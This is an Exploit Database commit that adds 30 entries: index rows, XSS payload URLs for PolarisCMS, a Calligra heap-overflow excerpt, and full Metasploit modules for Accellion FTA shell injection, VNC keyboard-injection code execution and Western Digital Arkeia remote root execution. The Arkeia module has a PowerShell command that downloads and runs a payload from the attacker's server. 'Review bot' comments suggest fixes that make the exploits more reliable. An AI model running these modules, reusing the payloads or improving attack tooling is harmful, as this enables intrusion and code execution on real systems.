DB: 2015-07-14

30 new exploits
This commit is contained in:
Offensive Security 2015-07-14 05:03:24 +00:00
parent de22c9ec44
commit 5d9a8808ca
31 changed files with 2315 additions and 0 deletions


@ -33913,3 +33913,33 @@ id,file,description,date,author,platform,type,port
37571,platforms/multiple/webapps/37571.txt,"Zenoss <= 3.2.1 Multiple Security Vulnerabilities",2012-07-30,"Brendan Coles",multiple,webapps,0
37572,platforms/php/webapps/37572.txt,"Elefant CMS 'id' Parameter Cross Site Scripting Vulnerability",2012-08-03,PuN!Sh3r,php,webapps,0
37573,platforms/multiple/webapps/37573.txt,"Worksforweb iAuto Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-08-06,"Benjamin Kunz Mejri",multiple,webapps,0
37575,platforms/php/webapps/37575.txt,"Joomla! 'com_photo' module Multiple SQL Injection Vulnerabilities",2012-08-06,"Chokri Ben Achor",php,webapps,0
37576,platforms/linux/remote/37576.cpp,"Alligra Calligra Heap Based Buffer Overflow Vulnerability",2012-08-07,"Charlie Miller",linux,remote,0
37577,platforms/asp/webapps/37577.txt,"PolarisCMS 'WebForm_OnSubmit()' Function Cross Site Scripting Vulnerability",2012-08-05,"Gjoko Krstic",asp,webapps,0
37578,platforms/php/webapps/37578.txt,"Open Constructor users/users.php keyword Parameter XSS",2012-08-04,"Lorenzo Cantoni",php,webapps,0
37579,platforms/php/webapps/37579.txt,"Open Constructor data/file/edit.php result Parameter XSS",2012-08-04,"Lorenzo Cantoni",php,webapps,0
37580,platforms/php/webapps/37580.txt,"Open Constructor confirm.php q Parameter XSS",2012-08-04,"Lorenzo Cantoni",php,webapps,0
37581,platforms/php/webapps/37581.txt,"Dir2web system/src/dispatcher.php oid Parameter SQL Injection",2012-08-07,"Daniel Correa",php,webapps,0
37582,platforms/php/webapps/37582.py,"Mibew Messenger 1.6.4 'threadid' Parameter SQL Injection Vulnerability",2012-08-05,"Ucha Gobejishvili",php,webapps,0
37583,platforms/php/webapps/37583.txt,"YT-Videos Script 'id' Parameter SQL Injection Vulnerability",2012-08-06,3spi0n,php,webapps,0
37584,platforms/php/webapps/37584.txt,"TCExam 11.2.x /admin/code/tce_edit_answer.php Multiple Parameter SQL Injection",2012-08-07,"Chris Cooper",php,webapps,0
37585,platforms/php/webapps/37585.txt,"TCExam 11.2.x /admin/code/tce_edit_question.php subject_module_id Parameter SQL Injection",2012-08-07,"Chris Cooper",php,webapps,0
37586,platforms/php/webapps/37586.php,"PBBoard Authentication Bypass Vulnerability",2012-08-07,i-Hmx,php,webapps,0
37587,platforms/php/webapps/37587.txt,"GetSimple 'path' Parameter Local File Include Vulnerability",2012-08-07,PuN!Sh3r,php,webapps,0
37588,platforms/php/webapps/37588.txt,"phpSQLiteCMS - Multiple Vulnerabilities",2015-07-13,"John Page",php,webapps,80
37589,platforms/java/webapps/37589.txt,"ConcourseSuite Multiple Cross Site Scripting and Cross Site Request Forgery Vulnerabilities",2012-08-08,"Matthew Joyce",java,webapps,0
37590,platforms/php/webapps/37590.txt,"PHPList 2.10.18 'unconfirmed' Parameter Cross-Site Scripting Vulnerability",2012-08-08,"High-Tech Bridge SA",php,webapps,0
37591,platforms/php/webapps/37591.php,"AraDown 'id' Parameter SQL Injection Vulnerability",2012-08-08,G-B,php,webapps,0
37592,platforms/php/webapps/37592.php,"FreiChat 9.6 - SQL Injection",2015-07-13,"Kacper Szurek",php,webapps,80
37593,platforms/windows/dos/37593.py,"Full Player 8.2.1 - Memory Corruption PoC",2015-07-13,"SATHISH ARTHAR",windows,dos,0
37594,platforms/php/webapps/37594.txt,"Arab Portal 3 - SQL Injection Vulnerability",2015-07-13,"ali ahmady",php,webapps,80
37595,platforms/php/webapps/37595.txt,"phpVibe - Aribtrary File Disclosure",2015-07-13,"ali ahmady",php,webapps,80
37596,platforms/php/webapps/37596.txt,"ArticleFR 3.0.6 - Multiple Vulnerabilities",2015-07-13,LiquidWorm,php,webapps,80
37597,platforms/hardware/remote/37597.rb,"Accellion FTA getStatus verify_oauth_token Command Execution",2015-07-13,metasploit,hardware,remote,443
37598,platforms/multiple/remote/37598.rb,"VNC Keyboard Remote Code Execution",2015-07-13,metasploit,multiple,remote,5900
37599,platforms/windows/remote/37599.rb,"Adobe Flash opaqueBackground Use After Free",2015-07-13,metasploit,windows,remote,0
37600,platforms/multiple/remote/37600.rb,"Western Digital Arkeia Remote Code Execution",2015-07-13,metasploit,multiple,remote,617
37601,platforms/php/webapps/37601.txt,"WordPress Swim Team Plugin 1.44.10777 - Arbitrary File Download",2015-07-13,"Larry W. Cashdollar",php,webapps,80
37602,platforms/php/webapps/37602.txt,"ZenPhoto 1.4.8 - Multiple Vulnerabilities",2015-07-13,"Tim Coen",php,webapps,80
37603,platforms/php/webapps/37603.txt,"WordPress CP Contact Form with Paypal Plugin 1.1.5 - Multiple Vulnerabilities",2015-07-13,"Nitin Venkatesh",php,webapps,80
37604,platforms/php/webapps/37604.txt,"SO Planning 1.32 - Multiple Vulnerabilities",2015-07-13,"Huy-Ngoc DAU",php,webapps,80
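Review bot: Two of the added descriptions carry typos that will show up verbatim in the searchable index: entry 37595 reads "Aribtrary File Disclosure" (should be "Arbitrary") and entry 37576 reads "Alligra Calligra" where the product is Calligra, as the advisory body added in this same commit says. The port column is also inconsistent within this hunk, with the back-filled 2012 webapps rows using 0 and the 2015 webapps rows using 80; if 80 is the intended convention for web application entries it would be worth applying uniformly, though the split may be deliberate for imported rows.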



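--- /dev/null
+++ b/platforms/asp/webapps/37577.txt
@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/54817/info
+PolarisCMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+http://www.example.com/reselleradmin/blog.aspx?%27%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E
+http://www.example.com/reselleradmin/blog.aspx?%27onmouseover=prompt(101)%3E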


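--- /dev/null
+++ b/platforms/hardware/remote/37597.rb
@@ -0,0 +1,125 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'msf/core'
+class Metasploit3 < Msf::Exploit::Remote
+Rank = ExcellentRanking
+include Msf::Exploit::Remote::HttpClient
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'Accellion FTA getStatus verify_oauth_token Command Execution',
+'Description' => %q{
+This module exploits a metacharacter shell injection vulnerability in the Accellion
+File Transfer appliance. This vulnerability is triggered when a user-provided
+'oauth_token' is passed into a system() call within a mod_perl handler. This
+module exploits the '/tws/getStatus' endpoint. Other vulnerable handlers include
+'/seos/find.api', '/seos/put.api', and /seos/mput.api'. This issue was confirmed on
+version FTA_9_11_200, but may apply to previous versions as well. This issue was
+fixed in software update FTA_9_11_210.
+},
+'Author' => [ 'hdm' ],
+'License' => MSF_LICENSE,
+'References' =>
+[
+['URL', 'http://r-7.co/R7-2015-08'],
+['CVE', '2015-2857']
+],
+'Platform' => ['unix'],
+'Arch' => ARCH_CMD,
+'Privileged' => false,
+'Payload' =>
+{
+'Space' => 1024,
+'DisableNops' => true,
+'Compat' =>
+{
+'PayloadType' => 'cmd',
+'RequiredCmd' => 'generic perl bash telnet',
+}
+},
+'Targets' =>
+[
+[ 'Automatic', { } ]
+],
+'DefaultTarget' => 0,
+'DisclosureDate' => 'Jul 10 2015'
+))
+register_options(
+[
+Opt::RPORT(443),
+OptBool.new('SSL', [true, 'Use SSL', true])
+], self.class)
+end
+def check
+uri = '/tws/getStatus'
+res = send_request_cgi({
+'method' => 'POST',
+'uri' => uri,
+'vars_post' => {
+'transaction_id' => rand(0x100000000),
+'oauth_token' => 'invalid'
+}})
+unless res && res.code == 200 && res.body.to_s =~ /"result_msg":"MD5 token is invalid"/
+return Exploit::CheckCode::Safe
+end
+res = send_request_cgi({
+'method' => 'POST',
+'uri' => uri,
+'vars_post' => {
+'transaction_id' => rand(0x100000000),
+'oauth_token' => "';echo '"
+}})
+unless res && res.code == 200 && res.body.to_s =~ /"result_msg":"Success","transaction_id":"/
+return Exploit::CheckCode::Safe
+end
+Msf::Exploit::CheckCode::Vulnerable
+end
+def exploit
+# The token is embedded into a command line the following:
+# `/opt/bin/perl /home/seos/system/call_webservice.pl $aid oauth_ws.php verify_access_token '$token' '$scope'`;
+token = "';#{payload.encoded};echo '"
+uri = '/tws/getStatus'
+# Other exploitable URLs:
+# * /seos/find.api (works with no other changes to this module)
+# * /seos/put.api (requires some hoop jumping, upload)
+# * /seos/mput.api (requires some hoop jumping, token && upload)
+print_status("Sending request for #{uri}...")
+res = send_request_cgi({
+'method' => 'POST',
+'uri' => uri,
+'vars_post' => {
+'transaction_id' => rand(0x100000000),
+'oauth_token' => token
+}})
+if res && res.code == 200 && res.body.to_s =~ /"result_msg":"Success","transaction_id":"/
+print_status("Valid response received...")
+else
+if res
+print_error("Unexpected reply from the target: #{res.code} #{res.message} #{res.body}")
+else
+print_error("No reply received from the target")
+end
+end
+handler
+end
+end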
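Review bot: In exploit the payload is spliced into a single-quoted shell argument (`token = "';#{payload.encoded};echo '"`) but the Payload hash declares no BadChars, so any encoded command that itself contains a single quote would unbalance the quoting of the call_webservice.pl command line and fail silently; adding `'BadChars' => "'"` to the Payload block lets the framework reject or encode such payloads up front. Separately, the second probe in check sends `';echo '` and keys on the Success message, which means check already executes a command on the appliance rather than merely fingerprinting it — worth stating in the description so operators know check is an active injection test, e.g. `# NOTE: check() performs a harmless 'echo' injection; it is not a passive fingerprint`. The description text also has an unbalanced quote in `and /seos/mput.api'`, which reads oddly in `info`.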


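--- /dev/null
+++ b/platforms/java/webapps/37589.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/54881/info
+The ConcourseSuite is prone to a cross-site request-forgery vulnerability and multiple cross-site scripting vulnerabilities.
+An attacker can exploit these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, add, delete, or modify sensitive information, or perform unauthorized actions. Other attacks are also possible.
+ConcourseSuite version 6.1 (20120209) is vulnerable; other versions may also be affected.
+http://www.example.com/crm/Sales.do?nameFirst&nameLast
+http://www.example.com/crm/ExternalContacts.do?nameFirst&nameLast&company
+http://www.example.com/crm/Accounts.do?name
+http://www.example.com/crm/MyCFSProfile.do?address1state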


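--- /dev/null
+++ b/platforms/linux/remote/37576.cpp
@@ -0,0 +1,21 @@
+source: http://www.securityfocus.com/bid/54816/info
+Calligra is prone to a remote buffer-overflow vulnerability.
+An attacker can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions.
+Calligra 2.4.3 and KOffice 2.3.3 are vulnerable; other versions may also be affected.
+bool STD::read( U16 baseSize, U16 totalSize, OLEStreamReader* stream, bool
+preservePos )
+...
+grupxLen = totalSize - ( stream->tell() - startOffset );
+grupx = new U8[ grupxLen ];
+int offset = 0;
+for ( U8 i = 0; i < cupx; ++i) {
+U16 cbUPX = stream->readU16(); // size of the next UPX
+stream->seek( -2, G_SEEK_CUR ); // rewind the "lookahead"
+cbUPX += 2; // ...and correct the size
+for ( U16 j = 0; j < cbUPX; ++j ) {
+grupx[ offset + j ] = stream->readU8(); // read the whole UPX
+}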
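Review bot: The excerpt shows the defect but never names it for the reader: `grupxLen` is derived from `totalSize` and the heap buffer is sized from it, yet the inner loop writes `grupx[ offset + j ]` for every `cbUPX` read from the attacker-controlled stream with no check that `offset + cbUPX <= grupxLen`, so an oversized UPX length runs past the allocation. A one-line annotation above the inner loop, e.g. `// BUG: cbUPX comes from the file and is never bounded against grupxLen -> heap overflow`, would make the advisory usable without reading the whole function. The body of STD::read continues past the end of this file section, so where `offset` is advanced (and whether any later check exists) is not visible here.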


@ -0,0 +1,186 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex/proto/rfb'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
WINDOWS_KEY = "\xff\xeb"
ENTER_KEY = "\xff\x0d"
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStager
include Msf::Exploit::Powershell
def initialize(info = {})
super(update_info(info,
'Name' => 'VNC Keyboard Remote Code Execution',
'Description' => %q{
This module exploits VNC servers by sending virtual keyboard keys and executing
a payload. On Windows systems a command prompt is opened and a PowerShell or CMDStager
payload is typed and executed. On Unix/Linux systems a xterm terminal is opened
and a payload is typed and executed.
},
'Author' => [ 'xistence <xistence[at]0x90.nl>' ],
'Privileged' => false,
'License' => MSF_LICENSE,
'Platform' => %w{ win unix },
'Targets' =>
[
[ 'VNC Windows / Powershell', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ],
[ 'VNC Windows / VBScript CMDStager', { 'Platform' => 'win' } ],
[ 'VNC Linux / Unix', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ]
],
'References' =>
[
[ 'URL', 'http://www.jedi.be/blog/2010/08/29/sending-keystrokes-to-your-virtual-machines-using-X-vnc-rdp-or-native/']
],
'DisclosureDate' => 'Jul 10 2015',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(5900),
OptString.new('PASSWORD', [ false, 'The VNC password']),
OptInt.new('TIME_WAIT', [ true, 'Time to wait for payload to be executed', 20])
], self.class)
end
def press_key(key)
keyboard_key = "\x04\x01" # Press key
keyboard_key << "\x00\x00\x00\x00" # Unknown / Unused data
keyboard_key << key # The keyboard key
# Press the keyboard key. Note: No receive is done as everything is sent in one long data stream
sock.put(keyboard_key)
end
def release_key(key)
keyboard_key = "\x04\x00" # Release key
keyboard_key << "\x00\x00\x00\x00" # Unknown / Unused data
keyboard_key << key # The keyboard key
# Release the keyboard key. Note: No receive is done as everything is sent in one long data stream
sock.put(keyboard_key)
end
def exec_command(command)
values = command.chars.to_a
values.each do |value|
press_key("\x00#{value}")
release_key("\x00#{value}")
end
press_key(ENTER_KEY)
end
def start_cmd_prompt
print_status("#{rhost}:#{rport} - Opening Run command")
# Pressing and holding windows key for 1 second
press_key(WINDOWS_KEY)
Rex.select(nil, nil, nil, 1)
# Press the "r" key
press_key("\x00r")
# Now we can release both keys again
release_key("\x00r")
release_key(WINDOWS_KEY)
# Wait a second to open run command window
select(nil, nil, nil, 1)
exec_command('cmd.exe')
# Wait a second for cmd.exe prompt to open
Rex.select(nil, nil, nil, 1)
end
def exploit
begin
alt_key = "\xff\xe9"
f2_key = "\xff\xbf"
password = datastore['PASSWORD']
connect
vnc = Rex::Proto::RFB::Client.new(sock, :allow_none => false)
unless vnc.handshake
fail_with(Failure::Unknown, "#{rhost}:#{rport} - VNC Handshake failed: #{vnc.error}")
end
if password.nil?
print_status("#{rhost}:#{rport} - Bypass authentication")
# The following byte is sent in case the VNC server end doesn't require authentication (empty password)
sock.put("\x10")
else
print_status("#{rhost}:#{rport} - Trying to authenticate against VNC server")
if vnc.authenticate(password)
print_status("#{rhost}:#{rport} - Authenticated")
else
fail_with(Failure::NoAccess, "#{rhost}:#{rport} - VNC Authentication failed: #{vnc.error}")
end
end
# Send shared desktop
unless vnc.send_client_init
fail_with(Failure::Unknown, "#{rhost}:#{rport} - VNC client init failed: #{vnc.error}")
end
if target.name =~ /VBScript CMDStager/
start_cmd_prompt
print_status("#{rhost}:#{rport} - Typing and executing payload")
execute_cmdstager({:flavor => :vbs, :linemax => 8100})
# Exit the CMD prompt
exec_command('exit')
elsif target.name =~ /Powershell/
start_cmd_prompt
print_status("#{rhost}:#{rport} - Typing and executing payload")
command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true, encode_final_payload: true})
# Execute powershell payload and make sure we exit our CMD prompt
exec_command("#{command} && exit")
elsif target.name =~ /Linux/
print_status("#{rhost}:#{rport} - Opening 'Run Application'")
# Press the ALT key and hold it for a second
press_key(alt_key)
Rex.select(nil, nil, nil, 1)
# Press F2 to start up "Run application"
press_key(f2_key)
# Release ALT + F2
release_key(alt_key)
release_key(f2_key)
# Wait a second for "Run application" to start
Rex.select(nil, nil, nil, 1)
# Start a xterm window
print_status("#{rhost}:#{rport} - Opening xterm")
exec_command('xterm')
# Wait a second for "xterm" to start
Rex.select(nil, nil, nil, 1)
# Execute our payload and exit (close) the xterm window
print_status("#{rhost}:#{rport} - Typing and executing payload")
exec_command("nohup #{payload.encoded} &")
exec_command('exit')
end
print_status("#{rhost}:#{rport} - Waiting for session...")
(datastore['TIME_WAIT']).times do
Rex.sleep(1)
# Success! session is here!
break if session_created?
end
rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout => e
fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{e.message}")
ensure
disconnect
end
end
def execute_command(cmd, opts = {})
exec_command(cmd)
end
end
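Review bot: When PASSWORD is not supplied the exploit method writes a single `"\x10"` byte and goes straight to `vnc.send_client_init` without reading any security result from the server, so a server that actually requires authentication fails later with the unrelated "VNC client init failed" message instead of a NoAccess failure; reading and checking the server's reply after selecting the security type would make that path explicit. The accompanying status line `Bypass authentication` is also misleading — nothing is bypassed, the module is selecting the no-authentication security type — so something like `print_status("#{rhost}:#{rport} - No password supplied, selecting the 'None' security type")` reads more honestly. In start_cmd_prompt the wait after pressing Win+R uses bare `select(nil, nil, nil, 1)` while every other wait in the module uses `Rex.select(nil, nil, nil, 1)`; make them consistent. Finally, exec_command frames each keysym as `"\x00#{value}"`, which only yields the expected 8-byte KeyEvent for single-byte characters — if an encoded payload ever contains a non-ASCII character the message boundaries shift and every later keystroke is misparsed, so a guard or a comment stating the ASCII-only assumption would help.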


@ -0,0 +1,555 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Western Digital Arkeia Remote Code Execution',
'Description' => %q{
This module exploits a code execution flaw in Western Digital Arkeia version 11.0.12 and below.
The vulnerability exists in the 'arkeiad' daemon listening on TCP port 617. Because there are
insufficient checks on the authentication of all clients, this can be bypassed.
Using the ARKFS_EXEC_CMD operation it's possible to execute arbitrary commands with root or
SYSTEM privileges.
The daemon is installed on both the Arkeia server as well on all the backup clients. The module
has been successfully tested on Windows, Linux, OSX, FreeBSD and OpenBSD.
},
'Author' =>
[
'xistence <xistence[at]0x90.nl>' # Vulnerability discovery and Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
],
'Privileged' => true,
'Stance' => Msf::Exploit::Stance::Aggressive,
'Payload' =>
{
'DisableNops' => true
},
'Targets' =>
[
[ 'Windows',
{
'Arch' => ARCH_X86,
'Platform' => 'win',
}
],
[ 'Linux',
{
'Arch' => ARCH_CMD,
'Platform' => 'unix',
'Payload' =>
{
'DisableNops' => true,
'Space' => 60000,
'Compat' => {
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'perl python bash-tcp gawk openssl'
}
}
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jul 10 2015'))
register_options(
[
Opt::RPORT(617),
OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the payload request', 15])
], self.class)
end
def check
connect
req = "\x00\x41"
req << "\x00" * 5
req << "\x73"
req << "\x00" * 12
req << "\xc0\xa8\x02\x74"
req << "\x00" * 56
req << "\x74\x02\xa8\xc0"
req << 'ARKADMIN'
req << "\x00"
req << 'root'
req << "\x00"
req << 'root'
req << "\x00" * 3
req << '4.3.0-1' # version?
req << "\x00" * 11
sock.put(req)
header = sock.get_once(6)
unless header && header.length == 6 && header[0, 4] == "\x00\x60\x00\x04"
disconnect
return Exploit::CheckCode::Unknown
end
data_length = sock.get_once(2)
unless data_length && data_length.length == 2
disconnect
return Exploit::CheckCode::Unknown
end
data_length = data_length.unpack('n')[0]
data = sock.get_once(data_length)
unless data && data.length == data_length
disconnect
return Exploit::CheckCode::Unknown
end
req = "\x00\x73"
req << "\x00" * 5
req << "\x0c\x32"
req << "\x00" * 11
sock.put(req)
header = sock.get_once(6)
unless header && header.length == 6 && header[0, 4] == "\x00\x60\x00\x04"
disconnect
return Exploit::CheckCode::Unknown
end
data_length = sock.get_once(2)
unless data_length && data_length.length == 2
disconnect
return Exploit::CheckCode::Unknown
end
data_length = data_length.unpack('n')[0]
data = sock.get_once(data_length)
unless data && data.length == data_length
disconnect
return Exploit::CheckCode::Unknown
end
req = "\x00\x61\x00\x04\x00\x01\x00\x11\x00\x00\x31\x00"
req << 'EN' # Language
req << "\x00" * 11
sock.put(req)
header = sock.get_once(6)
unless header && header.length == 6 && header[0, 4] == "\x00\x43\x00\x00"
disconnect
return Exploit::CheckCode::Unknown
end
data_length = sock.get_once(2)
unless data_length && data_length.length == 2
disconnect
return Exploit::CheckCode::Unknown
end
data_length = data_length.unpack('n')[0]
unless data_length == 0
disconnect
return Exploit::CheckCode::Unknown
end
# ARKADMIN_GET_CLIENT_INFO
req = "\x00\x62\x00\x01"
req << "\x00" * 3
req << "\x26"
req << 'ARKADMIN_GET_CLIENT_INFO' # Function to request agent information
req << "\x00\x32\x38"
req << "\x00" * 11
sock.put(req)
header = sock.get_once(6)
unless header && header.length == 6 && header[0, 4] == "\x00\x43\x00\x00"
disconnect
return Exploit::CheckCode::Unknown
end
data_length = sock.get_once(2)
unless data_length && data_length.length == 2
disconnect
return Exploit::CheckCode::Unknown
end
data_length = data_length.unpack('n')[0]
unless data_length == 0
disconnect
return Exploit::CheckCode::Unknown
end
req = "\x00\x63\x00\x04\x00\x00\x00\x12\x30\x00\x31\x00\x32\x38"
req << "\x00" * 12
sock.put(req)
# 1st packet
header = sock.get_once(6)
unless header && header.length == 6 && header[0, 4] == "\x00\x63\x00\x04"
disconnect
return Exploit::CheckCode::Unknown
end
data_length = sock.get_once(2)
unless data_length && data_length.length == 2
disconnect
return Exploit::CheckCode::Unknown
end
data_length = data_length.unpack('n')[0]
data = sock.get_once(data_length)
unless data && data.length == data_length
disconnect
return Exploit::CheckCode::Unknown
end
# 2nd packet
header = sock.get_once(6)
unless header && header.length == 6 && header[0, 4] == "\x00\x68\x00\x04"
disconnect
return Exploit::CheckCode::Unknown
end
data_length = sock.get_once(2)
unless data_length && data_length.length == 2
disconnect
return Exploit::CheckCode::Unknown
end
data_length = data_length.unpack('n')[0]
data = sock.get_once(data_length)
unless data && data.length == data_length
disconnect
return Exploit::CheckCode::Unknown
end
# 3rd packet
header = sock.get_once(6)
unless header && header.length == 6 && header[0, 4] == "\x00\x65\x00\x04"
disconnect
return Exploit::CheckCode::Unknown
end
data_length = sock.get_once(2)
unless data_length && data_length.length == 2
disconnect
return Exploit::CheckCode::Unknown
end
data_length = data_length.unpack('n')[0]
data = sock.get_once(data_length)
unless data && data.length == data_length && data.include?('You have successfully retrieved client information')
disconnect
return Exploit::CheckCode::Unknown
end
# 4th packet
header = sock.get_once(6)
unless header && header.length == 6 && header[0, 4] == "\x00\x69\x00\x04"
disconnect
return Exploit::CheckCode::Unknown
end
data_length = sock.get_once(2)
unless data_length && data_length.length == 2
disconnect
return Exploit::CheckCode::Unknown
end
data_length = data_length.unpack('n')[0]
data = sock.get_once(data_length)
unless data && data.length == data_length
disconnect
return Exploit::CheckCode::Unknown
end
if data =~ /VERSION.*WD Arkeia ([0-9]+\.[0-9]+\.[0-9]+)/
version = $1
vprint_status("#{rhost}:#{rport} - Arkeia version detected: #{version}")
if Gem::Version.new(version) <= Gem::Version.new('11.0.12')
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe
end
else
vprint_status("#{rhost}:#{rport} - Arkeia version not detected")
return Exploit::CheckCode::Unknown
end
end
def exploit
if target.name =~ /Windows/
@down_file = rand_text_alpha(8+rand(8))
@pl = generate_payload_exe
begin
Timeout.timeout(datastore['HTTP_DELAY']) {super}
rescue Timeout::Error
end
elsif target.name =~ /Linux/
communicate(payload.encoded)
return
end
end
def primer
@payload_url = get_uri
# PowerShell web download. The char replacement is needed because using the "/" character twice (like http://)
# is not possible on Windows agents.
command = "PowerShell -Command \"$s=[CHAR][BYTE]47;$b=\\\"#{@payload_url.gsub(/\//, '$($s)')}\\\";"
command << "(New-Object System.Net.WebClient).DownloadFile($b,'c:/#{@down_file}.exe');"
command << "(New-Object -com Shell.Application).ShellExecute('c:/#{@down_file}.exe');\""
communicate(command)
end
def communicate(command)
print_status("#{rhost}:#{rport} - Connecting to Arkeia daemon")
connect
print_status("#{rhost}:#{rport} - Sending agent communication")
req = "\x00\x41\x00\x00\x00\x00\x00\x70"
req << "\x00" * 12
req << "\xc0\xa8\x02\x8a"
req << "\x00" * 56
req << "\x8a\x02\xa8\xc0"
req << 'ARKFS'
req << "\x00"
req << 'root'
req << "\x00"
req << 'root'
req << "\x00" * 3
req << '4.3.0-1' # Client version ?
req << "\x00" * 11
sock.put(req)
header = sock.get_once(6)
unless header && header.length == 6 && header[0, 4] == "\x00\x60\x00\x04"
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
end
data_length = sock.get_once(2)
unless data_length && data_length.length == 2
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
end
data_length = data_length.unpack('n')[0]
data = sock.get_once(data_length)
unless data && data.length == data_length
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet data")
end
req = "\x00\x73\x00\x00\x00\x00\x00\x0c\x32"
req << "\x00" * 11
sock.put(req)
header = sock.get_once(6)
unless header && header.length == 6 && header[0, 4] == "\x00\x60\x00\x04"
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
end
data_length = sock.get_once(2)
unless data_length && data_length.length == 2
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
end
data_length = data_length.unpack('n')[0]
data = sock.get_once(data_length)
unless data && data.length == data_length
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet data")
end
req = "\x00\x61\x00\x04\x00\x01\x00\x1a\x00\x00"
req << rand_text_numeric(10) # "1234567890" - 10 byte numerical value, like a session ID?
req << "\x00"
req << 'EN' # English language?
req << "\x00" * 11
sock.put(req)
header = sock.get_once(6)
unless header && header.length == 6 && header[0, 4] == "\x00\x43\x00\x00"
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
end
data_length = sock.get_once(2)
unless data_length && data_length.length == 2
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
end
data_length = data_length.unpack('n')[0]
unless data_length == 0
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unexpected length read")
end
req = "\x00\x62\x00\x01\x00\x02\x00\x1b"
req << 'ARKFS_EXEC_CMD' # With this function we can execute system commands with root/SYSTEM privileges
req << "\x00\x31"
req << "\x00" * 11
sock.put(req)
header = sock.get_once(6)
unless header && header.length == 6 && header[0, 4] == "\x00\x43\x00\x00"
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
end
data_length = sock.get_once(2)
unless data_length && data_length.length == 2
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
end
data_length = data_length.unpack('n')[0]
unless data_length == 0
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unexpected length read")
end
req = "\x00\x63\x00\x04\x00\x03\x00\x15\x31\x00\x31\x00\x31\x00\x30\x3a\x31\x2c"
req << "\x00" * 11
sock.put(req)
command_length = '%02x' % command.length
command_length = command_length.scan(/../).map { |x| x.hex.chr }.join
req = "\x00\x64\x00\x04\x00\x04"
req << [command.length].pack('n')
req << command # Our command to be executed
req << "\x00"
print_status("#{rhost}:#{rport} - Executing payload through ARKFS_EXEC_CMD")
sock.put(req)
header = sock.get_once(6)
unless header && header.length == 6 && header[0, 4] == "\x00\x63\x00\x04"
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
end
data_length = sock.get_once(2)
unless data_length && data_length.length == 2
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
end
data_length = data_length.unpack('n')[0]
data = sock.get_once(data_length)
unless data && data.length == data_length
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet data")
end
# 1st Packet
header = sock.get_once(6)
unless header && header.length == 6 && header[0, 4] == "\x00\x68\x00\x04"
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
end
data_length = sock.get_once(2)
unless data_length && data_length.length == 2
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
end
data_length = data_length.unpack('n')[0]
data = sock.get_once(data_length)
unless data && data.length == data_length
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet data")
end
# 2st Packet
header = sock.get_once(6)
unless header && header.length == 6 && header[0, 4] == "\x00\x68\x00\x04"
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
end
data_length = sock.get_once(2)
unless data_length && data_length.length == 2
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
end
data_length = data_length.unpack('n')[0]
data = sock.get_once(data_length)
unless data && data.length == data_length
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet data")
end
end
def on_request_uri(cli, request)
print_status("Request: #{request.uri}")
if request.uri == get_resource
print_status('Sending payload...')
send_response(cli, @pl)
